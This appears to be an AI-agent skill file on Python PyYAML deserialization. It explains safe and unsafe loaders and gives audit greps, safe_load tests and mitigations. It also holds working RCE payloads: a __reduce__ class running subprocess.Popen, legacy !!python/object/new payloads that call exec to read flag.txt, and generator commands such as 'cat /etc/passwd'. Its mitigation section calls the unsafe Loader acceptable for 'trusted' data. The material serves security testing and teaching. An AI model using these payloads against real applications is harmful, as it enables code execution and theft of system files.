Hacktricks-skills python-yaml-deserialization

Security skill for understanding, testing, and mitigating Python YAML deserialization vulnerabilities. Use this skill whenever the user mentions YAML deserialization, PyYAML security, Python RCE through YAML, deserialization attacks, or needs to audit code for unsafe yaml.load() usage. Also trigger for requests about safe YAML loading practices, payload generation for authorized security testing, or explaining how !!python/object tags work.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/pentesting-web/deserialization/python-yaml-deserialization/SKILL.MD

Python YAML Deserialization Security

This skill helps you understand, test, and mitigate YAML deserialization vulnerabilities in Python applications. Use this for authorized security testing only.

Understanding the Vulnerability

PyYAML can deserialize Python objects, not just raw data. This becomes dangerous when untrusted input is deserialized with unsafe loaders.

How Serialization Works

import yaml

# Plain data: dumped as an ordinary scalar
print(yaml.dump(str("lol")))
# Output:
# lol
# ...

# Python objects: dumped with !!python/ tags (loading them back is the dangerous step)
print(yaml.dump(tuple("lol")))
# Output:
# !!python/tuple
# - l
# - o
# - l

print(yaml.dump(range(1,10)))
# Output:
# !!python/object/apply:builtins.range
# - 1
# - 10
# - 1

The `!!python/` tags indicate Python object serialization. Deserializing them with an unsafe loader can execute arbitrary code.
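To make the role of these tags concrete, here is a minimal sketch that lists the `python/` tags in a YAML document without constructing any objects. It relies on `yaml.parse()`, which only runs the scanner and parser. The function name `find_python_tags` is an illustrative assumption, not part of PyYAML or of this skill.

```python
import yaml

# Resolved form of the "!!python/" shorthand ("!!" expands to "tag:yaml.org,2002:").
PYTHON_TAG_PREFIX = "tag:yaml.org,2002:python/"

def find_python_tags(text):
    """Return the python/* tags found in `text` (hypothetical helper).

    yaml.parse() yields parser events only, so nothing is instantiated.
    """
    tags = []
    for event in yaml.parse(text, Loader=yaml.SafeLoader):
        tag = getattr(event, "tag", None)  # stream/document/alias events carry no tag
        if tag and tag.startswith(PYTHON_TAG_PREFIX):
            tags.append(tag)
    return tags

print(find_python_tags("name: test\nvalue: 123"))
# []
print(find_python_tags("!!python/object/apply:time.sleep [2]"))
# ['tag:yaml.org,2002:python/object/apply:time.sleep']
```

Malformed input still raises `yaml.YAMLError`, so callers would normally wrap the call in a `try` block.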

Safe vs Unsafe Loaders

Function	Loader	Safe?	Notes
`safe_load()`	SafeLoader	✅ Yes	Only basic types
`safe_load_all()`	SafeLoader	✅ Yes	Only basic types
`load()` (no Loader)	Version-dependent	❌ No	Unsafe Loader before 5.1; FullLoader with a warning from 5.1; TypeError from 6.0 (Loader is required)
`load(Loader=Loader)`	Loader	❌ No	Deserializes objects
`load(Loader=UnsafeLoader)`	UnsafeLoader	❌ No	Deserializes objects
`load(Loader=FullLoader)`	FullLoader	❌ No	Constructs a restricted set of Python objects; code-execution bypasses were only fixed in 5.4
`unsafe_load()`	UnsafeLoader	❌ No	Deserializes objects
`full_load()`	FullLoader	❌ No	Same behavior as `load(Loader=FullLoader)`

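Key insight: what `yaml.load()` does without a Loader depends on the PyYAML version. Before 5.1 it used the unsafe `Loader`; from 5.1 it emits a warning and falls back to `FullLoader`; from 6.0 the Loader argument is mandatory. Explicitly passing `Loader`, `UnsafeLoader`, or `FullLoader` enables Python object deserialization, so only `SafeLoader` (or `safe_load()`) is appropriate for untrusted input.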
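The loader differences can be checked empirically on whatever PyYAML version is installed. The sketch below feeds a harmless probe (`time.sleep(0)`) to each loader and records whether it was constructed or rejected. The `probe_loaders` name and the result strings are assumptions made for illustration.

```python
import yaml

# Harmless probe: if a loader constructs it, time.sleep(0) runs and returns None.
PROBE = "!!python/object/apply:time.sleep [0]"

def probe_loaders():
    """Map each loader name to 'constructed', 'rejected', or 'unavailable'."""
    results = {}
    for name in ("SafeLoader", "FullLoader", "UnsafeLoader"):
        loader = getattr(yaml, name, None)
        if loader is None:  # FullLoader/UnsafeLoader do not exist before PyYAML 5.1
            results[name] = "unavailable"
            continue
        try:
            yaml.load(PROBE, Loader=loader)
            results[name] = "constructed"
        except yaml.YAMLError:
            results[name] = "rejected"
    return results

for name, outcome in probe_loaders().items():
    print(f"{name}: {outcome}")
```

`SafeLoader` should report `rejected` and `UnsafeLoader` `constructed`; the `FullLoader` outcome varies with the installed version, which is the reason it should not be trusted with untrusted input.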

Basic Exploits

Simple Command Execution

import yaml
from yaml import UnsafeLoader

# Execute sleep command
data = b'!!python/object/apply:time.sleep [2]'
yaml.load(data, Loader=UnsafeLoader)  # Sleeps for 2 seconds

RCE via Custom Payload

import yaml
import subprocess
from yaml import UnsafeLoader

class Payload:
    def __reduce__(self):
        return (subprocess.Popen, ('ls',))

# Serialize the payload
serialized = yaml.dump(Payload())
print(serialized)
# Output:
# !!python/object/apply:subprocess.Popen
# - ls

# Deserialize (executes the command)
yaml.load(serialized, Loader=UnsafeLoader)
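For contrast with the `yaml.dump()` call above, the following sketch shows the serialization-side counterpart: `yaml.safe_dump()` refuses objects it cannot express as plain YAML, so it does not emit `!!python/` tags. The helper name `safe_dump_or_reason` is an assumption for illustration, and the `Payload` class here uses a harmless `print` stand-in rather than a command.

```python
import yaml

class Payload:
    def __reduce__(self):
        # Harmless stand-in for a command; never reached because safe_dump refuses first.
        return (print, ("side effect on load",))

def safe_dump_or_reason(obj):
    """Return the safe_dump() output, or a short note if the object is refused."""
    try:
        return yaml.safe_dump(obj)
    except yaml.YAMLError as exc:
        return f"refused: {type(exc).__name__}"

# Tuples are written as plain sequences, without a !!python/tuple tag.
print(safe_dump_or_reason({"name": "test", "items": (1, 2)}))

# Arbitrary objects are rejected instead of being serialized with !!python/ tags.
print(safe_dump_or_reason(Payload()))
# refused: RepresenterError
```

Pairing `safe_dump()` on the writing side with `safe_load()` on the reading side keeps both directions limited to basic types.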

Legacy Exploit (Old PyYAML Versions)

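For older PyYAML releases, where `yaml.load()` could be called without a Loader (before 5.1 the default was the unsafe Loader; from 5.1 until the fixes in 5.4, the default FullLoader could still be abused with payloads like this one):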

!!python/object/new:str
state: !!python/tuple
  - 'print(getattr(open("flag.txt"), "read")())'
  - !!python/object/new:Warning
    state:
      update: !!python/name:exec

Or the one-liner variant:

!!python/object/new:str {
  state:
    !!python/tuple [
      'print(exec("print(open(\"flag.txt\",\"r\").read())"))',
      !!python/object/new:Warning { state: { update: !!python/name:exec } },
    ],
}

Generating Payloads

Use the `generate_yaml_payload.py` script (bundled with this skill) to create test payloads:

python scripts/generate_yaml_payload.py --command "cat /etc/passwd" --output payload.yaml

Or use the external tool python-deserialization-attack-payload-generator:

python3 peas.py
# Enter RCE command: cat /root/flag.txt
# Enter OS: linux
# Select Module: PyYAML
# Done! Check /tmp/example_yaml

Auditing Code for Vulnerabilities

Vulnerable Patterns

# ❌ VULNERABLE - explicit unsafe loader
yaml.load(data, Loader=UnsafeLoader)
yaml.load(data, Loader=Loader)
yaml.load(data, Loader=FullLoader)

# ❌ VULNERABLE - unsafe functions
yaml.unsafe_load(data)
yaml.full_load(data)

# ❌ VULNERABLE - PyYAML <6.0 without Loader
yaml.load(data)  # <5.1: unsafe Loader; 5.1 and later: FullLoader plus a warning; 6.0+: TypeError

Safe Patterns

# ✅ SAFE - use safe_load
yaml.safe_load(data)
yaml.safe_load_all(data)

# ✅ SAFE - name SafeLoader explicitly (works on every PyYAML version)
yaml.load(data, Loader=yaml.SafeLoader)

# ✅ SAFE - parse with safe_load first, then validate the resulting structure
data = yaml.safe_load(raw_text)
if not isinstance(data, dict):
    raise ValueError("expected a mapping at the top level")

Quick Audit Checklist

Search the codebase for `yaml.load(`
Check whether a Loader argument is specified
If Loader is `UnsafeLoader`, `Loader`, or `FullLoader` → VULNERABLE
If using `unsafe_load()` or `full_load()` → VULNERABLE
Check the PyYAML version: before 5.1, `yaml.load()` without a Loader uses the unsafe Loader; from 5.1 it falls back to FullLoader with a warning; from 6.0 the Loader argument is required
Verify all YAML input is from trusted sources
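The first four checklist items can be partly automated. Below is a minimal sketch that uses the standard `ast` module to flag risky calls in a piece of source code. It assumes the module is referenced as `yaml` (adjust `module_alias` otherwise) and does not follow `from yaml import load` style imports; the function and set names are illustrative, not part of this skill.

```python
import ast

UNSAFE_FUNCS = {"unsafe_load", "unsafe_load_all", "full_load", "full_load_all"}
UNSAFE_LOADERS = {"Loader", "UnsafeLoader", "FullLoader",
                  "CLoader", "CUnsafeLoader", "CFullLoader"}

def _name_of(node):
    """Return the trailing identifier of `Loader` or `yaml.Loader`, else None."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        return node.attr
    return None

def audit_source(source, module_alias="yaml"):
    """Return sorted (line, message) findings for risky calls on `module_alias`."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)):
            continue
        func = node.func
        if not (isinstance(func.value, ast.Name) and func.value.id == module_alias):
            continue
        if func.attr in UNSAFE_FUNCS:
            findings.append((node.lineno, f"{func.attr}() can construct Python objects"))
        elif func.attr in ("load", "load_all"):
            loader_nodes = [kw.value for kw in node.keywords if kw.arg == "Loader"]
            loader_nodes += node.args[1:2]  # Loader passed positionally
            if not loader_nodes:
                findings.append((node.lineno, f"{func.attr}() without Loader: version-dependent"))
            elif _name_of(loader_nodes[0]) in UNSAFE_LOADERS:
                findings.append((node.lineno, f"{func.attr}() with {_name_of(loader_nodes[0])}"))
    return sorted(findings)

sample = """\
import yaml
a = yaml.safe_load(text)
b = yaml.load(text, Loader=yaml.UnsafeLoader)
c = yaml.full_load(text)
d = yaml.load(text)
"""
for line, message in audit_source(sample):
    print(line, message)
# 3 load() with UnsafeLoader
# 4 full_load() can construct Python objects
# 5 load() without Loader: version-dependent
```

A syntax-tree check avoids false positives from comments and strings that a plain text search would report, but it is still a heuristic and does not replace reviewing where the YAML input comes from.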

Mitigation Strategies

1. Always Use safe_load()

# Replace all unsafe loading with safe_load
data = yaml.safe_load(file_content)
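In practice `safe_load()` is often wrapped so that size limits, parse errors, and shape checks live in one place. The following is a sketch of such a wrapper under stated assumptions: the name `load_untrusted_mapping`, the 64 KiB limit, and the "top level must be a mapping" rule are all illustrative choices, not requirements of PyYAML.

```python
import yaml

MAX_BYTES = 64 * 1024  # hypothetical size limit for untrusted documents

def load_untrusted_mapping(text):
    """Parse untrusted YAML with safe_load() and require a top-level mapping."""
    if len(text.encode("utf-8")) > MAX_BYTES:
        raise ValueError("YAML document too large")
    try:
        data = yaml.safe_load(text)
    except yaml.YAMLError as exc:
        # Covers syntax errors as well as rejected tags such as !!python/object/apply.
        raise ValueError(f"invalid or disallowed YAML: {exc}") from exc
    if not isinstance(data, dict):
        raise ValueError("expected a mapping at the top level")
    return data

print(load_untrusted_mapping("name: test\nvalue: 123"))
# {'name': 'test', 'value': 123}
```

Raising a single exception type keeps the calling code simple: it only needs to handle `ValueError`, whatever the reason for rejection.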

2. Validate Input Source

# Only deserialize YAML from trusted sources
if source == "internal_config":
    data = yaml.load(content, Loader=Loader)  # OK for trusted data
else:
    data = yaml.safe_load(content)  # Required for untrusted data

3. Use Alternative Formats

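Consider JSON for data interchange. `json.loads()` only produces dicts, lists, strings, numbers, booleans, and None, so it cannot instantiate arbitrary Python objects:

import json

# json.loads() builds only basic types; still validate the resulting structure
data = json.loads(json_string)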

4. Pin PyYAML Version

# pyproject.toml
[project]
dependencies = ["PyYAML>=6.0"]  # From 6.0, yaml.load() without a Loader raises TypeError
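Because the behavior of a bare `yaml.load(data)` call changed across releases, it can help to spell out what a given version does. The sketch below maps a PyYAML version string to that default behavior; the function name and the returned wording are assumptions for illustration.

```python
import re

def default_load_behavior(version):
    """Describe what yaml.load(data) with no Loader does for a PyYAML version string."""
    match = re.match(r"(\d+)\.(\d+)", version)
    if match is None:
        raise ValueError(f"unrecognized version: {version!r}")
    major_minor = (int(match.group(1)), int(match.group(2)))
    if major_minor < (5, 1):
        return "unsafe: uses the full-power Loader"
    if major_minor < (6, 0):
        return "warns and falls back to FullLoader"
    return "raises TypeError: Loader is required"

for version in ("3.13", "5.4.1", "6.0.1"):
    print(version, "->", default_load_behavior(version))
# 3.13 -> unsafe: uses the full-power Loader
# 5.4.1 -> warns and falls back to FullLoader
# 6.0.1 -> raises TypeError: Loader is required
```

To check the running environment, pass `yaml.__version__` to the function after `import yaml`.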

Testing Your Application

1. Check for Vulnerable Loaders

grep -r "yaml.load" --include="*.py" .
grep -r "UnsafeLoader" --include="*.py" .
grep -r "FullLoader" --include="*.py" .
grep -rE "(unsafe_load|full_load)" --include="*.py" .

2. Test with Payload

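# test_yaml_vuln.py
# Confirms that the installed PyYAML executes !!python/object/apply under UnsafeLoader.
# To test an application, send the same payload to its YAML entry point and watch for the delay.
import time
import yaml
from yaml import UnsafeLoader

test_payload = b'!!python/object/apply:time.sleep [1]'

start = time.monotonic()
try:
    yaml.load(test_payload, Loader=UnsafeLoader)
except yaml.YAMLError as e:
    print(f"Safe: payload rejected ({e})")
else:
    elapsed = time.monotonic() - start
    print(f"VULNERABLE: payload executed, call took {elapsed:.1f}s")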

3. Verify safe_load Works

import yaml

# This should work
safe_data = yaml.safe_load("name: test\nvalue: 123")
print(safe_data)  # {'name': 'test', 'value': 123}

# This should fail
try:
    yaml.safe_load("!!python/object/apply:time.sleep [1]")
except Exception as e:
    print(f"Correctly blocked: {e}")

When to Use This Skill

Use this skill when you need to:

Audit Python code for YAML deserialization vulnerabilities
Generate test payloads for authorized security testing
Understand how !!python/object tags work
Learn safe YAML loading practices
Explain deserialization attacks to stakeholders
Convert vulnerable yaml.load() calls to safe alternatives
Test applications for RCE via YAML